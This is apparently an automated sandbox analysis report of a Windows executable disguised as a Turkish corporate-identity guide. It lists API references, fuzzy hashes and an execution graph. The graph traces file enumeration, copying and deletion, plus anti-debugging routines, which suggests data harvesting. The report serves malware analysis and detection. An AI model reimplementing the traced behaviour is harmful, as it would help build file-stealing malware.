                                                                                                                                                • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                • Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                                                                                                                • Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                                • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,771A3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,771A3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405BB1
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                                                                                                                                • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                                                                                                                • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                • String ID: Call
                                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                                • Opcode ID: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
                                                                                                                                                • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                                                                                                                                • Opcode Fuzzy Hash: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
                                                                                                                                                • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                                Strings
                                                                                                                                                • Error launching installer, xrefs: 004058B6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                                                                                                                • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,771A3420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403936
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                                • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                                                                                                                                • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                                • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                • API String ID: 2709904686-3370423016
                                                                                                                                                • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                                                                                                                                • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 704D116A
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 704D11C7
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 704D11D9
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 704D1203
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1148824635.00000000704D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 704D0000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1148761933.00000000704D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148866058.00000000704D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148910359.00000000704D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_704d0000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                • Opcode ID: a2833ff47e5ff0bf322a2eb48481824a25d528ff54d98a73e79962ad5356367e
                                                                                                                                                • Instruction ID: 5d2cfcd058823dfc1e19845c572ca6ab95c75645aeecbdbe6f7c5478781953eb
                                                                                                                                                • Opcode Fuzzy Hash: a2833ff47e5ff0bf322a2eb48481824a25d528ff54d98a73e79962ad5356367e
                                                                                                                                                • Instruction Fuzzy Hash: 06318BB2500201BFD3018F75DD65A2DB7F8EB49311B20412AFF42E6334EA3DE8018BA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:2.7%
                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                Signature Coverage:1.3%
                                                                                                                                                Total number of Nodes:1662
                                                                                                                                                Total number of Limit Nodes:5
                                                                                                                                                execution_graph 6056 371c281c 6059 371c2882 6056->6059 6062 371c3550 6059->6062 6061 371c282a 6063 371c358a 6062->6063 6064 371c355d 6062->6064 6063->6061 6064->6063 6065 371c47e5 21 API calls 6064->6065 6066 371c357a 6065->6066 6066->6063 6068 371c544d 6066->6068 6069 371c545a 6068->6069 6070 371c5468 6068->6070 6069->6070 6074 371c547f 6069->6074 6071 371c6368 20 API calls 6070->6071 6072 371c5470 6071->6072 6077 371c62ac 6072->6077 6075 371c547a 6074->6075 6076 371c6368 20 API calls 6074->6076 6075->6063 6076->6072 6080 371c6231 6077->6080 6079 371c62b8 6079->6075 6081 371c5b7a 20 API calls 6080->6081 6082 371c6247 6081->6082 6083 371c62a6 6082->6083 6085 371c6255 6082->6085 6091 371c62bc IsProcessorFeaturePresent 6083->6091 6088 371c2ada 5 API calls 6085->6088 6086 371c62ab 6087 371c6231 26 API calls 6086->6087 6089 371c62b8 6087->6089 6090 371c627c 6088->6090 6089->6079 6090->6079 6092 371c62c7 6091->6092 6095 371c60e2 6092->6095 6096 371c60fe 6095->6096 6097 371c612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6096->6097 6098 371c61fb 6097->6098 6099 371c2ada 5 API calls 6098->6099 6100 371c6219 GetCurrentProcess TerminateProcess 6099->6100 6100->6086 7517 371c4bdd 7518 371c4bec 7517->7518 7519 371c4c08 7517->7519 7518->7519 7520 371c4bf2 7518->7520 7521 371c6d60 51 API calls 7519->7521 7522 371c6368 20 API calls 7520->7522 7523 371c4c0f GetModuleFileNameA 7521->7523 7524 371c4bf7 7522->7524 7525 371c4c33 7523->7525 7526 371c62ac 26 API calls 7524->7526 7540 371c4d01 7525->7540 7528 371c4c01 7526->7528 7532 371c4c66 7534 371c6368 20 API calls 7532->7534 7533 371c4c72 7535 371c4d01 38 API calls 7533->7535 7539 371c4c6b 7534->7539 7536 371c4c88 7535->7536 7538 371c571e 20 API calls 7536->7538 7536->7539 7537 371c571e 20 API calls 7537->7528 7538->7539 7539->7537 7542 371c4d26 7540->7542 7544 371c4d86 7542->7544 7552 371c70eb 7542->7552 7543 371c4c50 7546 371c4e76 7543->7546 7544->7543 7545 371c70eb 38 API calls 7544->7545 7545->7544 7547 371c4c5d 7546->7547 7548 371c4e8b 7546->7548 7547->7532 7547->7533 7548->7547 7549 371c637b 20 API calls 7548->7549 7550 371c4eb9 7549->7550 7551 371c571e 20 API calls 7550->7551 7551->7547 7555 371c7092 7552->7555 7556 371c54a7 38 API calls 7555->7556 7557 371c70a6 7556->7557 7557->7542 7238 371c4a9a 7241 371c5411 7238->7241 7242 371c541d 7241->7242 7243 371c5af6 38 API calls 7242->7243 7246 371c5422 7243->7246 7244 371c55a8 38 API calls 7245 371c544c 7244->7245 7246->7244 5798 371c1c5b 5799 371c1c6b 5798->5799 5802 371c12ee 5799->5802 5801 371c1c87 5803 371c1324 5802->5803 5804 371c13b7 GetEnvironmentVariableW 5803->5804 5828 371c10f1 5804->5828 5807 371c10f1 57 API calls 5808 371c1465 5807->5808 5809 371c10f1 57 API calls 5808->5809 5810 371c1479 5809->5810 5811 371c10f1 57 API calls 5810->5811 5812 371c148d 5811->5812 5813 371c10f1 57 API calls 5812->5813 5814 371c14a1 5813->5814 5815 371c10f1 57 API calls 5814->5815 5816 371c14b5 lstrlenW 5815->5816 5817 371c14d9 lstrlenW 5816->5817 5818 371c14d2 5816->5818 5819 371c10f1 57 API calls 5817->5819 5818->5801 5820 371c1501 lstrlenW lstrcatW 5819->5820 5821 371c10f1 57 API calls 5820->5821 5822 371c1539 lstrlenW lstrcatW 5821->5822 5823 371c10f1 57 API calls 5822->5823 5824 371c156b lstrlenW lstrcatW 5823->5824 5825 371c10f1 57 API calls 5824->5825 5826 371c159d lstrlenW lstrcatW 5825->5826 5827 371c10f1 57 API calls 5826->5827 5827->5818 5829 371c1118 5828->5829 5830 371c1129 lstrlenW 5829->5830 5841 371c2c40 5830->5841 5833 371c1168 lstrlenW 5834 371c1177 lstrlenW FindFirstFileW 5833->5834 5835 371c11a0 5834->5835 5836 371c11e1 5834->5836 5837 371c11aa 5835->5837 5838 371c11c7 FindNextFileW 5835->5838 5836->5807 5837->5838 5843 371c1000 5837->5843 5838->5835 5840 371c11da FindClose 5838->5840 5840->5836 5842 371c1148 lstrcatW lstrlenW 5841->5842 5842->5833 5842->5834 5844 371c1022 5843->5844 5845 371c10af 5844->5845 5846 371c102f lstrcatW lstrlenW 5844->5846 5849 371c10b5 lstrlenW 5845->5849 5859 371c10ad 5845->5859 5847 371c105a lstrlenW 5846->5847 5848 371c106b lstrlenW 5846->5848 5847->5848 5860 371c1e89 lstrlenW 5848->5860 5874 371c1e16 5849->5874 5852 371c1088 GetFileAttributesW 5854 371c109c 5852->5854 5852->5859 5853 371c10ca 5855 371c1e89 5 API calls 5853->5855 5853->5859 5854->5859 5866 371c173a 5854->5866 5856 371c10df 5855->5856 5879 371c11ea 5856->5879 5859->5837 5861 371c2c40 5860->5861 5862 371c1ea7 lstrcatW lstrlenW 5861->5862 5863 371c1ed1 lstrcatW 5862->5863 5864 371c1ec2 5862->5864 5863->5852 5864->5863 5865 371c1ec7 lstrlenW 5864->5865 5865->5863 5867 371c1747 5866->5867 5894 371c1cca 5867->5894 5871 371c199f 5871->5859 5872 371c1824 5872->5871 5914 371c15da 5872->5914 5875 371c1e29 5874->5875 5878 371c1e4c 5874->5878 5876 371c1e2d lstrlenW 5875->5876 5875->5878 5877 371c1e3f lstrlenW 5876->5877 5876->5878 5877->5878 5878->5853 5880 371c120e 5879->5880 5881 371c1e89 5 API calls 5880->5881 5882 371c1220 GetFileAttributesW 5881->5882 5883 371c1235 5882->5883 5884 371c1246 5882->5884 5883->5884 5886 371c173a 35 API calls 5883->5886 5885 371c1e89 5 API calls 5884->5885 5887 371c1258 5885->5887 5886->5884 5888 371c10f1 56 API calls 5887->5888 5889 371c126d 5888->5889 5890 371c1e89 5 API calls 5889->5890 5891 371c127f 5890->5891 5892 371c10f1 56 API calls 5891->5892 5893 371c12e6 5892->5893 5893->5859 5895 371c1cf1 5894->5895 5896 371c1d0f CopyFileW CreateFileW 5895->5896 5897 371c1d44 DeleteFileW 5896->5897 5898 371c1d55 GetFileSize 5896->5898 5903 371c1808 5897->5903 5899 371c1ede 22 API 